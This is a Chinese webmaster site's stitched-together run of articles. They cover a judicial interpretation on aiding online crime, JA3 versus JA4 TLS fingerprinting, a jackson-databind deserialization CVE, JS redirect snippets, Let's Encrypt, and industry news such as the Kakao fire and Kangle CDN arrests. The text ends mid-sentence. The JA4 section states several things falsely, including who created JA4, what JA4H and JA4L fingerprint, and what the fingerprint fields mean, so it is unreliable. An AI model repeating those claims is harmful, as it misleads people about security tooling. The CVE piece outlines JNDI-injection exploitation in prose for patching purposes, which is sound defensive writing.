为他人实施犯罪提供技术支持或者帮助,具有下列情形之一的,可以认定行为人明知他人利用信息网络实施犯罪,但是有相反证据的除外:(一)经监管部门告知后仍然实施有关行为的;(二)接到举报后不履行法定管理职责的;(三)交易价格或者方式明显异常的;(四)提供专门用于违法犯罪的程序、工具或者其他技术支持、帮助的;(五)频繁采用隐蔽上网、加密通信、销毁数据等措施或者使用虚假身份,逃避监管或者规避调查的;(六)为他人逃避监管或者规避调查提供技术支持、帮助的;(七)其他足以认定行为人明知的情形。第十二条  明知他人利用信息网络实施犯罪,为其犯罪提供帮助,具有下列情形之一的,应当认定为刑法第二百八十七条之二第一款规定的“情节严重”:(一)为三个以上对象提供帮助的;(二)支付结算金额二十万元以上的;(三)以投放广告等方式提供资金五万元以上的;(四)违法所得一万元以上的;(五)二年内曾因非法利用信息网络、帮助信息网络犯罪活动、危害计算机信息系统安全受过行政处罚,又帮助信息网络犯罪活动的;(六)被帮助对象实施的犯罪造成严重后果的;(七)其他情节严重的情形。实施前款规定的行为,确因客观条件限制无法查证被帮助对象是否达到犯罪的程度,但相关数额总计达到前款第二项至第四项规定标准五倍以上,或者造成特别严重后果的,应当以帮助信息网络犯罪活动罪追究行为人的刑事责任。第十三条  被帮助对象实施的犯罪行为可以确认,但尚未到案、尚未依法裁判或者因未达到刑事责任年龄等原因依法未予追究刑事责任的,不影响帮助信息网络犯罪活动罪的认定。第十四条  单位实施本解释规定的犯罪的,依照本解释规定的相应自然人犯罪的定罪量刑标准,对直接负责的主管人员和其他直接责任人员定罪处罚,并对单位判处罚金。第十五条  综合考虑社会危害程度、认罪悔罪态度等情节,认为犯罪情节轻微的,可以不起诉或者免予刑事处罚;情节显著轻微危害不大的,不以犯罪论处。第十六条  多次拒不履行信息网络安全管理义务、非法利用信息网络、帮助信息网络犯罪活动构成犯罪,依法应当追诉的,或者二年内多次实施前述行为未经处理的,数量或者数额累计计算。第十七条  对于实施本解释规定的犯罪被判处刑罚的,可以根据犯罪情况和预防再犯罪的需要,依法宣告职业禁止;被判处管制、宣告缓刑的,可以根据犯罪情况,依法宣告禁止令。第十八条  对于实施本解释规定的犯罪的,应当综合考虑犯罪的危害程度、违法所得数额以及被告人的前科情况、认罪悔罪态度等,依法判处罚金。第十九条  本解释自2019年11月1日起施行。 #### JA3和JA4指纹有什么区别 JA3和JA4都是用于TLS客户端指纹识别的技术,但JA4是JA3的现代化演进和替代品,旨在解决JA3的一些固有缺陷。 下面我将从多个维度详细对比它们的区别,并用一个简单的表格和比喻来总结。 核心区别概览 特性JA3JA4核心理念对TLS握手参数进行原始拼接后取哈希。标准化、模块化,将指纹拆分为可读的组件后再组合。指纹格式32位MD5哈希值(一串字母数字,如76947923...)。不具可读性。明文字符串+哈希(如t13d1516h2_8daaf...)。部分可读。计算方法拼接TLS版本 + 密码套件 + 扩展列表 + 椭圆曲线 + 曲线格式,然后计算MD5。将各个组件分别标准化、排序、去重,然后组合。对密码套件和扩展使用特定算法生成短哈希。抗混淆性弱。任何微小的改变(如更改扩展顺序)都会产生完全不同的哈希。强。通过排序和去重,忽略不重要的顺序变化,更关注核心特征。人类可读性几乎为零。你无法从哈希值中看出任何关于客户端的信息。高。从指纹字符串中可以直接看出TLS版本、支持的密码套件类型等。哈希算法MD5(已被证明存在碰撞漏洞,安全性较低)。无(组件明文)或FNV哈希(用于部分组件,非加密哈希,速度快,碰撞率低)。数据来源仅来自TLS ClientHello报文。除了TLS ClientHello(JA4),还扩展到TCP(JA4H)和HTTP/2(JA4L),提供更全面的指纹。 详细解析 1. JA3(传统方法) JA3由Salesforce在2017年提出,迅速成为TLS指纹识别的行业标准。 工作原理: 从TLS ClientHello报文中提取以下5个字段: TLS Version(TLS版本) Ciphers(密码套件列表) Extensions(扩展列表) Elliptic Curves(椭圆曲线) Elliptic Curve Formats(椭圆曲线格式) 将这些字段的值按顺序用“,”连接,形成一个长字符串。 对这个长字符串计算MD5哈希值,得到的32位十六进制数就是JA3指纹。 示例:7694793755038d6db3cef51e7c5e7c16 优点: 简单直接,计算快速。 普及度高,有庞大的历史数据库。 缺点: 脆弱性(易被混淆):由于是原始拼接,任何细微的更改(如调整扩展顺序、添加一个无意义的扩展)都会导致最终的MD5哈希截然不同。这使得恶意软件可以轻松通过“指纹混淆”技术来躲避检测。 不可读性:你无法通过观察JA3哈希值来了解客户端的任何特性,必须依赖数据库进行查询。 使用MD5:MD5是一种不安全的加密哈希函数,存在已知的碰撞攻击风险,不适合需要高可靠性的安全场景。 灵活性差:难以对指纹的特定部分进行分析和比较。 2. JA4(现代方法) JA4由Fox.io(现归属于Fastly)的Josh Atkins在2023年提出,旨在解决JA3的痛点。 核心理念:可读性、不可混淆性、模块化。 工作原理(以JA4S为例):JA4将指纹拆分成几个部分,分别进行处理: t:TLS版本(如TLS 1.3 = 13,TLS 1.2 = 12)。 d:密码套件。首先对密码套件进行去重和排序,然后将每个套件映射为一个单字符,最后对所有字符组成的字符串计算一个短的FNV哈希(如1516)。 h2:签名算法(SNI扩展中的指示)。同样经过排序、去重、映射和短哈希处理。 8daaf...:扩展列表。同样经过排序、去重、映射和长哈希处理。 最终格式:t + d + h + _ + 扩展列表哈希示例:t13d1516h2_8daaf6153f6b4c9c5d4e8a7b6c5d4e8f 优点: 可读性:看到t13就知道是TLS 1.3,看到h2就知道支持HTTP/2的签名算法。安全分析师无需查询数据库就能获得关键信息。 抗混淆性强:通过对列表进行排序和去重,JA4忽略了参数的顺序。恶意软件即使打乱了扩展顺序,只要支持的集合不变,生成的JA4指纹就是相同的。 更安全的哈希:使用FNV-1a哈希,它虽然非加密,但速度快、碰撞率极低,且没有MD5的安全隐患。 模块化与扩展性: JA4H:结合了TLS指纹(JA4)和TCP指纹,提供网络层+安全层的双重识别。 JA4L:针对HTTP/2协议的指纹。 这种设计使得未来可以轻松添加新的模块(如QUIC)。 更准确的分类:通过关注核心组件,JA4能更好地对客户端类型(如Chrome、Firefox、恶意Bot)进行分组。 通俗的比喻 JA3 就像是用一张照片的MD5哈希来识别一个人。 只要这个人换件衣服、换个发型、转个角度,照片的哈希值就完全变了。 你无法从哈希值中看出这个人是男是女,是长发还是短发。 JA4 就像是给一个人创建一个标准化的档案。 档案上写着:性别-男,发型-短发,瞳色-棕色_8daaf...。 无论他今天穿西装还是T恤,只要他的性别、发型、瞳色不变,他的档案ID核心部分就是不变的。 你可以直接从这个档案中读取到关键特征。 总结与现状 JA4不是JA3的简单升级,而是一种全新的、更科学的设计哲学。 它通过标准化处理流程,显著提升了指纹的稳定性、可读性和抗规避能力。随着网络安全威胁的日益复杂,JA4及其系列技术正逐渐成为新时代网络流量分析、威胁检测和Bot管理领域的新标准。虽然JA3由于历史原因仍有大量应用,但行业趋势正在向JA4迁移。对于新建项目,强烈建议采用JA4。 #### jackson-databind远程代码执行漏洞分析(CVE-2020-10673) 1.  漏洞描述 近日,云安全团队跟踪到jackson-databind在github上更新了一个新的反序列化利用类com.caucho.config.types.ResourceRef,issue编号2660,该类绕过了之前jackson-databind维护的黑名单类。如果项目中包含resin-kernel库,并且JDK版本较低的话,请及时升级jackson-databind到安全版本。 2. 影响范围 jackson-databind < 2.9.10.4 JDK < 6u201、7u191、8u182、11.0.1(LDAP) 3. 漏洞分析 该漏洞本质是java的JNDI注入,我们先来了解下JNDI基础知识。简单来说,JNDI是一组应用程序接口,它为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定位用户、网络、机器、对象和服务等各种资源。比如可以利用JNDI在局域网上定位一台打印机,也可以用JNDI来定位数据库服务或一个远程Java对象。JNDI底层支持RMI远程对象,RMI注册的服务可以通过JNDI接口来访问和调用。JNDI接口在初始化时,可以将RMI URL作为参数传入,而JNDI注入就出现在客户端的lookup()函数中,如果lookup()的参数可控就可能被攻击。 因此分析的时候,可以直接先搜索受影响类的lookup方法,看看漏洞入口在哪里,本文复现的时候用的是resin-kernel-4.0.52版本。 首先定位到com.caucho.config.types.ResourceRef类,我们在getValue方法中找到了jdni.lookup方法,但需要满足getLookupName方法不为空。 跟进到父类ResourceGroupConfig,getLookupName方法直接返回_lookupName变量,但会在setLookupName方法进行赋值。 因此可以确远程对象调用入口为lookupName,我们可以写入如下的反序列化的测试代码。由于触发是在getValue方法中,因此在反序列化后需要再调用writeValueAsString方法进行序列化,以触发get方法。可用marshalsec监听ldap服务,并制作好可执行命令的class文件。 其实,在这里还需要说下为什么需要调用mapper.enableDefaultTyping(),当不带参数调用enableDefaultTyping时,会设置DefaultTyping为OBJECT_AND_NON_CONCRETE。 DefaultTyping有四个选项: JAVA_LANG_OBJECT: 当对象属性类型为Object时生效; OBJECT_AND_NON_CONCRETE: 当对象属性类型为Object或者非具体类型(抽象类和接口)时生效; NON_CONCRETE_AND+_ARRAYS: 同上, 另外所有的数组元素的类型都是非具体类型或者对象类型; NON_FINAL: 对所有非final类型或者非final类型元素的数组。 因此,当开启DefaultTyping后,会开发者在反序列化时指定要还原的类,过程中调用其构造方法setter方法或某些特殊的getter方法,当这些方法中存在一些危险操作时就造成了代码执行。 官方在github的更新措施(https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15),仍然是添加com.caucho.config.types.ResourceRef为黑名单类,但这种方式治标不治本,后续可能出现其他绕过黑名单的gdaget。   4. 防御措施 及时将jackson-databind升级到安全版本(>=2.9.10.4,> 2.10.0); 升级到较高版本的JDK。   参考: https://qiita.com/shimizukawasaki/items/d72fb40b69bb0d328ee7 https://github.com/FasterXML/jackson-databind/issues/2660   文章转自百度安全:https://anquan.baidu.com/article/1069 #### Java主机如何设置默认首页文件? Java主机如何设置默认首页文档? 答:请在修改空间中/wwwroot/WEB-INF/web.xml文件!里面有设置默认首页文件设置: <welcome-file-list> <welcome-file>index.htm</welcome-file> <welcome-file>index.jsp</welcome-file> </welcome-file-list> 默认index.htm , index.jsp 为默认首页文档,可以自行添加,一行一个。   #### JetBrains 等多个社区成员宣布成立 PHP 基金会 11月23日消息:据LaravelNews报道,包括JetBrains在内的多个PHP社区成员今天宣布成立PHP基金会,以继续开发该语言。成员名单还包括Automattic、Laravel、Acquia、Zend、Craft CMS、Private Packagist、Tideways和PrestaShop。 PHP基金会将是一个非盈利性组织,其使命是通过资助对PHP语言有贡献的兼职/全职开发人员,确保PHP语言的长期生命和繁荣。这项 Open Collective 倡议旨在持续推进这款语言的未来发展。 据了解同这一决定背后的原因之一是Nikita Popov,主要贡献者之一,决定将他的注意力从PHP转向LLVM。Nikita Popov于2011年开始研究PHP,并在JetBrains从事了近三年的PHP工作,为那里的三个主要版本做出了重要贡献——PHP7.4、PHP8.0和PHP8.1。 基金会募集的资金将用于聘请PHP贡献者的服务,以进一步推动语言的发展。基金会的主要任务是资助开发人员从事 PHP 的工作。 主机吧不得不感叹国外的开源环境是真的好! #### jsdelivr CDN已经被国内DNS污染 jsdelivr是国外一个非常流行的开源项目免费CDN,相当于一个公共资源库,谁都可以免费调用上面的资源,一些非常流行的JavaScript资源上面都有,很多开发者都利用jsdelivr来提高速度。 不过,这样的一个项目,注定跟国内无缘的了。主机吧查了下jsdelivr CDN在国内处理被污染状态。 通过ping cdn.jsdelivr.net发现,国内解析都是一些乱七八糟的IP,但实际上jsdelivr只用了 Fastly和Cloudflare的CDN节点,其它节点都是被污染的。 至于为什么被污染,这个不好说,但国内肯定是用不了,如果你网站打开非常卡的,可以按F12-网络,查询下是不是链接这个开源项目导致的。 #### js跳转代码汇总 <span id="tiao">3</span><a href="javascript:countDown"></a>布丁足迹;秒后自动跳转……<meta http-equiv=refresh content=3;url='/search/billsearch.jsp'</ul>  <!--脚本开始-->  <script language="javascript" type="">  function countDown(secs){  tiao.innerText=secs;  if(--secs>0)  setTimeout("countDown("+secs+")",1000);  }  countDown(3);  </script>  <!--脚本结束-->  按钮式:  <INPUT name="pclog" type="button" value="GO" onClick="location.href='https://zhujib.com/'">  链接式:  <a href="javascript:history.go(-1)">返回上一步</a>  <a href="<%=Request.ServerVariables("HTTP_REFERER")%>">返回上一步</a>  直接跳转式:  <script>window.location.href='https://zhujib.com';</script>  开新窗口:  <a href="javascript:" onClick="window.open('https://zhujib.com/blog/guestbook.asp','','height=500,width=611,scrollbars=yes,status=yes')">布丁足迹</a>  JS跳转页面参考代码 第一种:  <script language="javascript" type="text/javascript">  window.location.href="login.jsp?backurl="+window.location.href;  </script>  第二种:  <script language="javascript">  alert("返回");  window.history.back(-1);  </script>  第三种:  <script language="javascript">  window.navigate("top.jsp");  </script>  第四种:  <script language="JavaScript">  self.location='top.htm';  </script>  第五种:  <script language="javascript">  alert("非法访问!");  top.location='xx.jsp';  </script>  =====javascript中弹出选择框跳转到其他页面=====  <script language="javascript">  <!--  function logout()...{  if (confirm("你确定要注销身份吗?是-选择确定,否-选择取消"))...{  window.location.href="logout.asp?act=logout"  }  }  -->  </script>  =====javascript中弹出提示框跳转到其他页面=====  <script language="javascript">  <!--  function logout()...{  alert("你确定要注销身份吗?");  window.location.href="logout.asp?act=logout"  }  -->  </script>  [/code] #### Kakao数据中心起火导致韩国网络服务大面积中断 当地时间 10 月 15 日,韩国 SK 公司 C&C 板桥数据中心发生火灾,导致包括韩国最大的移动通讯应用程序 Kakao Talk 在内的若干服务出现中断。 火灾发生后,出于安全考虑,数据中心的电源立即被切断。大约八小时后,大火被扑灭。 但KakaoTalk及其附属服务(比如移动支付和数字钱包服务Kakao Pay以及交通运输服务应用程序Kakao T)都遭遇了大规模的服务故障,故障持续了将近整整一天。 KakaoTalk是韩国5100万人口中最受欢迎的移动通讯工具,每月有4300万活跃用户。用户们表示,由于KakaoTalk聊天室被广泛用作一种接收独家消息、优惠券及其他实时信息的工具,他们的日常生活和工作都遇到了不便。这款通讯应用软件于2010年推出,还提供了一个平台,帮助用户购买线下商品、玩游戏以及访问银行服务。 一位不愿透露姓名的KakaoTalk用户说:“我需要通过KakaoTalk从我的商业合作伙伴那里收到一张照片。但由于KakaoTalk遭遇中断,我最后不得不通过电子邮件获取这张照片,整个过程很不方便。我应该使用Telegram。”一些人抱怨通过Kakao Pay进行移动支付和在线交易遇到了困难。该平台的一位用户说:“我每个月都会通过Kakao Pay自动向父母汇钱,但现在我没法验证。”提供打车和指定司机预约等交通服务的Kakao T出现了故障,也给出租车用户带来了麻烦。另一位用户说:“昨晚吃完晚饭,我用Kakao T应用程序叫了一辆出租车,但没叫成功,于是我就坐地铁回家。” 多家零售公司也受到了Kakao的大范围服务故障带来的影响。韩国星巴克公司提供一系列服务,包括Kakao Pay提供支持的移动支付服务和在KakaoTalk上购买咖啡券的在线购物服务,该公司表示一些服务无法正常使用。而当地食品配送电子商务公司Market Kurly宣布与Kakao Pay和KakaoTalk关联的支付系统无法使用。专家们指责Kakao对可能发生的灾难缺乏准备,这个韩国最大的通讯软件没有灾难恢复计划或备份站点。当地一家科技公司的一名工作人员表示:“如果Kakao使用热站点或备份站点保护其数据,服务中断问题会很快得到解决”,他还特别指出Kakao未能确保其数据得到适当的备份。 他们还指出,KakaoTalk近年来遇到了多次故障,包括本月早些时候登录系统出错以及去年传输消息出错。虽然Naver的服务部分遭到中断,但由于这家公司有异地备份,几小时内就恢复如初。Kakao表示,工作人员曾试图按照该公司的灾难管理流程来处理数据恢复,但他们没有料到在板桥数据中心发生火灾时会停电。Kakao的一名工作人员说:“我们在大火发生后开始启动了数据复制流程,但我们的工作因意外停电而受阻。我们所有的数据都被复制了,但恢复起来需要很长时间,因为我们有太多的数据。” Kakao表示,它正在首尔以南30公里的安山市建设自己的数据中心,该数据中心将于明年之前完工。但出于安全原因,它拒绝详细透露目前正在运营的其他数据中心的确切位置。  10 月 19 日,由于互联网巨头 Kakao 的大范围服务中断给严重依赖该公司服务的韩国造成了混乱,Kakao 联席 CEO Whon Namkoong 今天宣布辞职。 在周三举行的新闻发布会上,Whon Namkoong 就公司的服务中断道歉,并表示他将辞职。“我对这起事件负有重大责任,我将辞去 CEO 的职务,并领导紧急灾难特别工作组,监督事件的善后工作,”Whon Namkoong 表示,“我们将尽最大努力恢复用户对 Kakao 的信心,确保此类事件不再发生。” 公司文件显示,Kakao 另一名联席 CEO Hong Eun-taek 将留任。“我们真诚地向所有在服务中断期间受到影响的人道歉。”Hong Eun-taek 鞠躬致歉时称。 #### Kangle CDN要倒了:公司多名高管被抓 刚从卢松松博客了解到,圈内小有名气的CDN系统服务商Kangle CDN公司要倒了。公司多名高管被抓,Kangle CDN网站已经关站无法访问! 熟悉建站行业的同学大概都知道,Kangle 一个老牌的web服务器商,在站长圈也是小有名气,后续随着网络环境改变,他们公司也研发推出了自家CDN防护系统:“Kangle CDN”。 主机吧遇到过很多站长都用他们家的系统,比如卢松松博客之前也是他们家的。 根据从圈内某大佬出打探的小道消息得知,这次kangle踩雷,主要是因为Kangle CDN给违法网站提供了CDN接入和防护,算是触碰了隐藏的红线,直接导致该公司被南昌高新技术产业开发区人民检察院依法以涉嫌帮助信息网络犯罪活动罪对向南昌高新技术产业开发区人民法院提起公诉。 根据最新的法律法规,为非法网站提供软件开发、技术支持、互联网接入、服务器托管、网络存储空间等都会被刑事拘留。 目前该团队多名高管被抓,网站也已被暂时关站,搞不好,Kangle CDN网站估计要黄了! 而且从大佬处,意外得知这波,不仅仅是Kangle CDN中招了,奇安信网站也突然关闭了,官网目前一直无法访问,而且据说还有个f开头的CDN公司(主机吧猜测应该是Fikker )也被约谈了,目前正在处理中。   Kangle 是由南昌邦腾科技有限公司开发的一款服务器软件,不仅可以用来管理服务器,同时也可以用来反向代理CDN,国内很多公司站长都有使用过这个系统,安装量也一度比宝塔还多。 南昌邦腾科技有限公司旗下还有DNS盾和cdnbest(CDN呗),分别提供智能DNS服务与CDN自建平台,此次出事的应该就是CDN呗了,据了解CDN呗是一个完全的自助建设置CDN的控制平台,玩家可以利用这个平台很容易的建设CDN服务,而CDN呗却没有做任何内容审查,甚至可能知道客户做违法内容而不做为,这就涉嫌帮助信息网络犯罪活动了啦!在这里提醒各位站长,肉身在国内就不要做违法的事啦,被抓是迟早的事,国内对互联网违法抓捕已经很成熟了。 从今天开年起,主机吧就明显感觉到了国内互联网管理的严格,先是百度云加速被要求整改,不得为域名提供websocket,然后Cloudflare节点被频繁屏蔽,再到前几天的国内域名商开始大量封杀备案黑域名,到最近严查的服务器以及CDN接入问题,国内互联网云存储和安全防护服务领域,正在面临一波严格的大整改,违法违规业务已经很难在国内生存了。 #### let's encrypt免费SSL证书 Let's Encrypt 是一个免费、自动化、开放的证书颁发机构,致力于推动互联网从 HTTP 向更安全的 HTTPS 迁移。它由非营利组织 Internet Security Research Group 运营。 以下是其主要特点和介绍: 核心目标 普及 HTTPS: 通过消除获取和管理数字证书的成本与复杂性,让每个网站都能轻松启用 HTTPS 加密。 提升网络安全: 加密网站流量,保护用户数据在传输过程中不被窃听或篡改,增强隐私和安全性。 推动自动化: 自动化证书的申请、验证、颁发、安装和续订过程。 关键特性 完全免费: 提供标准的域名验证型 SSL/TLS 证书,不收取任何费用。 打破了传统商业 CA 的付费模式,极大地降低了 HTTPS 部署的门槛。 自动化 (ACME 协议): 使用 ACME 协议 实现自动化。用户(或代表用户的软件)可以通过该协议与 Let's Encrypt 服务器通信。 自动化流程: 验证所有权: 客户端证明自己控制着要申请证书的域名(通常通过在服务器上放置特定文件或设置特定 DNS 记录)。 证书申请: 验证通过后,客户端生成密钥对并提交证书签名请求。 证书颁发: Let's Encrypt 颁发证书。 证书安装: 客户端软件自动将证书安装到 Web 服务器上。 自动续订: 证书有效期短(90天),但续订过程完全自动化(通常通过 certbot 等客户端工具设置定时任务),确保网站持续加密,无需人工干预。 开放透明: 所有颁发的证书都记录在证书透明度日志中,任何人都可以查询验证,提高了整个证书生态系统的透明度和可信度。 其软件和操作流程是开源的。 受广泛信任: 其根证书和中间证书被所有主流操作系统、浏览器和设备信任。使用 Let's Encrypt 证书的网站在用户浏览器中会显示安全的挂锁图标。 证书类型: 主要提供 DV 证书,仅验证域名所有权。 支持 SAN 和 通配符证书。 SAN证书: 一张证书可包含多个域名。 通配符证书: 保护一个域名及其所有一级子域名。 工作原理简述 用户在服务器上安装 ACME 客户端(最流行的是 certbot)。 客户端向 Let's Encrypt 发起申请。 Let's Encrypt 向客户端发送一个挑战(如 HTTP-01:在特定 URL 放置特定文件;或 DNS-01:在域名下添加特定 TXT 记录)。 客户端完成挑战,证明控制权。 验证通过后,Let's Encrypt 颁发证书。 客户端自动下载并配置证书到 Web 服务器(如 Nginx, Apache)。 客户端设置定时任务(如 cron job),在证书到期前(通常是在 60-70 天左右)自动重复上述过程进行续订。 优势 零成本: 无需购买证书。 简单易用: 自动化工具(如 certbot)大大简化了配置和续订流程。 提高安全性: 强制短有效期(90天)鼓励自动化,减少了证书被盗用或忘记续费导致过期的风险。 推动 Web 安全标准: 是推动全网 HTTPS 普及的最大功臣之一。 局限性 仅限 DV 证书: 不提供验证组织身份的 OV 证书或扩展验证的 EV 证书(EV 证书在浏览器 UI 中的显示优势也在逐渐减弱)。 90 天有效期: 虽然自动化解决了续订问题,但理论上比传统 1-2 年有效期的证书需要更频繁的交互(自动化处理了)。 速率限制: 为防止滥用,对证书申请、重复申请、失败验证等有严格的速率限制,大型部署需要仔细规划。 主要客户端 Certbot: 官方推荐,功能最全,支持广泛的服务器软件和操作系统。 acme.sh: 纯 Shell 脚本实现,轻量灵活,非常流行。 各种 Web 主机控制面板(如 cPanel, Plesk)、服务器软件(如 Caddy 内置支持)也集成了对 Let's Encrypt 的支持。 总结 Let's Encrypt 彻底改变了 SSL/TLS 证书的获取方式,通过免费、自动化、开放的理念,极大地促进了 HTTPS 在全球范围内的普及,使互联网变得更加安全。对于个人网站、博客、小型企业乃至大型平台来说,它都是部署 HTTPS 的首选方案之一。其核心价值在于消除了成本和复杂性这两大阻碍 HTTPS 普及的关键障碍。 Here's a concise and informative English introduction to Let's Encrypt: Let's Encrypt: A Free, Automated, and Open Certificate Authority Let's Encrypt is a non-profit certificate authority (CA) run by Internet Security Research Group (ISRG). Its mission is to make HTTPS ubiquitous on the Web by providing free, automated, and standard SSL/TLS certificates to everyone. Key Features & Benefits: Free: It eliminates the cost barrier to securing websites by offering Domain Validation (DV) certificates at absolutely no charge. Automated: Leverages the ACME protocol to automate the entire certificate lifecycle: Domain Validation: Proves ownership via challenges (HTTP-01, DNS-01, TLS-ALPN-01). Issuance: Generates certificates automatically upon successful validation. Installation & Renewal: Tools like Certbot or acme.sh handle installation and auto-renewal (certificates expire every 90 days). Open & Transparent: All issued certificates are publicly logged in Certificate Transparency (CT) logs. Its software and processes are open-source. Widely Trusted: Root certificates are trusted by all major browsers, operating systems, and devices, ensuring the padlock icon appears for users. Certificate Types: Standard DV Certificates: Validates domain ownership only. SAN (Subject Alternative Name): Secures multiple domains/subdomains with one certificate. Wildcard Certificates (*.example.com): Secures a base domain and all its first-level subdomains. How It Works (Simplified): Install an ACME client (e.g., Certbot) on your web server. The client contacts Let's Encrypt to request a certificate. Let's Encrypt issues a challenge to prove domain control. The client completes the challenge (e.g., places a file, sets a DNS record). Upon verification, Let's Encrypt issues the certificate. The client automatically installs/confiures it. The client automatically renews the certificate before its 90-day expiry. Why It's Important: Democratizes HTTPS: Makes strong encryption accessible to everyone – individuals, small businesses, NGOs – not just large enterprises. Enhances Security: Encrypts data in transit, protecting user privacy and preventing tampering. Simplifies Management: Automation drastically reduces the complexity and time required to deploy and maintain HTTPS. Drives Web Security: A major force behind the widespread adoption of HTTPS across the internet. Considerations: Offers DV certificates only (not Organization Validation - OV - or Extended Validation - EV). 90-day certificate validity requires reliable automation for renewal (handled well by clients). Has rate limits to prevent abuse. Popular Clients: Certbot (official, feature-rich), acme.sh (lightweight, shell-based), Caddy server (built-in). In short: Let's Encrypt revolutionized web security by providing free, automated SSL/TLS certificates. It removes cost and complexity barriers, making encrypted HTTPS the default standard for all websites, fostering a more secure and privacy-respecting internet for everyone. #### Let's Encrypt免费SSL证书简体中文版上线啦 之前有写过Let's Encrypt的免费SSL证书的申请方法,不过那时候因为网页是英文的,所以用了谷歌翻译来翻译操作,虽然整体上看没什么问题,不过毕竟翻译的不如直接中文版好。 这不Let's Encrypt就推出了中文版网页了。 打开网页https://letsencrypt.org/,选Languages下拉的简体中文即可。 不过主机吧看了下很多文档还没翻译,估计是刚搞吧,letsencrypt.org的官网文档对普通站长来说可能比较高端,如果你只是一个小白可以看主机吧之前发的文章教学《Let’s Encrypt 支持申请免费泛域名SSL证书啦 菜鸟申请教程》适合小白。 随着我们国内互联网地位越来越高,目前国际上很多大站都相继推出了中文简体版,比如全球最大的域名商godaddy就推出了中文简体。这里我们先不说其它的,Let's Encrypt是目前全球最大的免费SSL证书,虽然证书有效时间只有3个月,但是是可以续签的,支持平台非常多,还支持泛解析的证书,这在其它SSL证书商那可是卖几千块一年的,为站长省下不少钱。       #### Let's Encrypt宣布SSL证书有效期将逐步缩短至45天,同步推出持久DNS验证方案 12月2日,全球广泛使用的免费证书颁发机构Let's Encrypt宣布,将在未来数年内逐步缩短其TLS证书的有效期,目标在2028年将目前90天的有效期减半至45天。此举旨在响应CA/Browser Forum的行业安全规范,推动更严格的证书生命周期管理,并减少证书泄露或被盗可能造成的安全影响。 分阶段实施计划为确保平稳过渡,Let's Encrypt制定了为期三年的分阶段调整路径: 2026年5月13日:启用 tlsserver 配置,支持用户提前选择签发45天有效期的证书。 2027年2月10日:将默认 classic 配置的有效期调整为64天,并将域名授权(Authorization)的重用期从30天缩短至10天。 2028年2月16日:全面实施45天有效期,并将授权重用期进一步缩短至7小时,显著提升安全强度。 自动化续期与新验证机制对于大多数已实现自动化证书管理的用户,系统将自动适应新周期,无需手动干预。Let's Encrypt强烈建议用户启用 ACME 续期信息(ARI)扩展,以帮助客户端更智能地判断最佳续期时机。 为解决频繁续期带来的验证负担,Let's Encrypt同步宣布正在开发 DNS-PERSIST-01 持久验证方案。该方案允许用户在DNS中一次性设置TXT记录,后续证书续期时可重复使用同一记录,无需反复修改DNS配置,显著降低自动化运维的复杂性和故障风险。该功能预计于2026年正式推出。 行业影响与建议这一调整进一步推动了“短有效期、高自动化”的证书管理模式,旨在提升网络身份验证的整体安全基线。Let's Encrypt建议所有用户: 确认现有ACME客户端是否支持ARI,并尽早启用该功能; 检查自动化续期流程,确保能在证书过期前稳定完成续期; 关注DNS-PERSIST-01等新验证方式的进展,以简化未来的证书运维工作。 本次调整体现了证书颁发机构在便捷性与安全性之间的持续平衡,也预示着更短证书生命周期将成为行业标准趋势。 #### Let's Encrypt的免费证书和收费的证书有什么区别 1. 证书类型与验证级别 Let's Encrypt 免费证书:仅提供域名验证型(DV)证书,验证流程仅确认申请人对域名的控制权(如 DNS 记录、服务器文件验证等),不验证企业或组织的真实身份。浏览器中仅显示安全锁图标,不显示组织名称。 收费证书: DV 证书:与 Let's Encrypt 的 DV 类似,但部分厂商可能提供更便捷的验证流程或附加服务。 企业验证型(OV)证书:需验证企业合法性(如营业执照、联系方式等),浏览器显示安全锁和组织名称,增强用户信任。 增强验证型(EV)证书:最高级别验证,需通过严格的第三方审核(如法律文件、实体地址核实等),浏览器地址栏显示绿色背景 + 组织名称,显著提升可信度,常用于金融、电商等高敏感场景。 2. 有效期与续期规则 当前政策(2025 年): Let's Encrypt 免费证书: 有效期仍为90 天,需通过自动化工具(如 Certbot)自动续期,未及时续期会导致证书过期。 收费证书: 最长有效期为 398 天(约 13 个月),但实际中 CA 通常提供 1 年期证书(如 GlobalSign、DigiCert 等)。 部分 CA 支持自动续期或到期提醒服务,减少管理成本。 未来政策调整(CA/B 论坛提案 SC-081v3): 2026 年 3 月 15 日起: 所有 SSL/TLS 证书(包括收费证书)的最长有效期缩短至 200 天,无论类型(DV/OV/EV)。 2027 年 3 月 15 日起: 进一步缩短至100 天。 2029 年 3 月 15 日起: 最终缩短至47 天,同时验证数据(如域名所有权)的重复使用期限从 398 天缩短至 10 天,需更频繁重新验证。 核心影响: 所有证书(包括收费证书)的有效期将大幅缩短,手动管理证书将变得不可行,企业需依赖自动化工具(如 ACME 协议、证书管理系统)实现无感续期。 EV 证书虽仍需每年审核企业信息,但有效期同步缩短,进一步增加合规成本。 3. 域名支持范围 Let's Encrypt 免费证书: 支持通配符域名(Wildcard):需通过 DNS 验证(ACME DNS-01)申请,HTTP 验证不支持。 支持多域名(SAN 证书):可绑定多个域名或子域名,但需手动验证每个域名。 收费证书: 对通配符、多域名的支持更灵活,部分厂商允许一键申请包含多个域名的证书,甚至支持跨域名组合(如 example.com 和 another.com)。 高端证书(如 EV)可能对多域名数量有限制,需单独购买附加项。 4. 技术支持与服务 Let's Encrypt 免费证书: 无官方付费技术支持,依赖开源社区(如 ACME 协议文档、论坛)或第三方工具提供商的免费教程,问题排查需自行解决。 收费证书: 提供专业客服支持(如电话、邮件、工单),可协助解决证书申请失败、安装配置错误、兼容性问题等。 部分厂商提供 SLA(服务级别协议),承诺故障响应时效。 5. 保险与法律保障 Let's Encrypt 免费证书: 不提供任何保险或赔偿保障,若因证书问题导致数据泄露或业务损失,用户需自行承担责任。 收费证书: 高端证书(如 OV/EV)通常附带责任保险(如 GlobalSign EV 证书提供最高 175 万美元赔付),用于赔偿因证书签发错误或加密失效导致的用户损失。 部分厂商提供法律支持,协助处理证书相关的合规性争议。 6. 信任标识与品牌展示 Let's Encrypt 免费证书: 浏览器中仅显示基础安全锁图标,无独立信任标志(Site Seal),无法直接向用户展示证书厂商背书。 收费证书: 可在网站上展示厂商信任标志(如 DigiCert、Sectigo 的 Logo),部分厂商提供动态验证徽章(点击后显示证书详细信息),提升用户对网站安全性的感知。 EV 证书的绿色地址栏是最显著的信任标识,尤其对金融、电商用户影响显著。 7. 安全性与兼容性 相同点: Let's Encrypt 与收费证书均由受信任的 CA 签发,加密强度(如 TLS 